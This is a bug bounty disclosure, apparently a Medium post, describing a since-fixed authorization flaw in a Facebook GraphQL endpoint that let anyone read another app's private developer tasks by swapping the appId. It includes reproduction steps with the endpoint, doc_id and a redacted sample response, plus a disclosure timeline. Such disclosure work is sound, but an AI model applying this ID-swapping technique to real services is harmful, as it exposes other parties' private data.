Access developer tasks list of any Facebook Application (Bug Bounty)

This vulnerability could have let a malicious user access developer tasks list of any Facebook Application. Developer tasks are private informations that should be accessed only by the authorized developer of the concerned Facebook application.

Image for post
Image for post

While browsing https://developers.facebook.com/apps/ I noticed a GraphQL request that was returning the tasks list of my Facebook application.

By intercepting the request and changing the appId value with the ID of a third party Facebook Application, I was able to access to the tasks list of the targeted app.

Reproduction Steps

1) Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:

&variables={“appId”:”X”}&doc_id=265437575802287

Where X is the appId

The GraphQL response will return the developer tasks list of the targeted Facebook application:

{
“data”:{
“app_tasks”:[
{“id”:”REDACTED”,
“app_id”:”X”,
“app_name”:”REDACTED”,
“task_objective”:”REDACTED”,
“deadline”:1606147652,
“completion_time”:1605495171}],
“user_tasks_open_count”:0},
“extensions”:{
“is_final”:true}
}

Timeline

January 6, 2021: Report Sent
January 8, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded by Facebook

Twitter: https://twitter.com/amineaboud

Entrepreneur & cyber security enthusiast doing bug bounty for fun.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store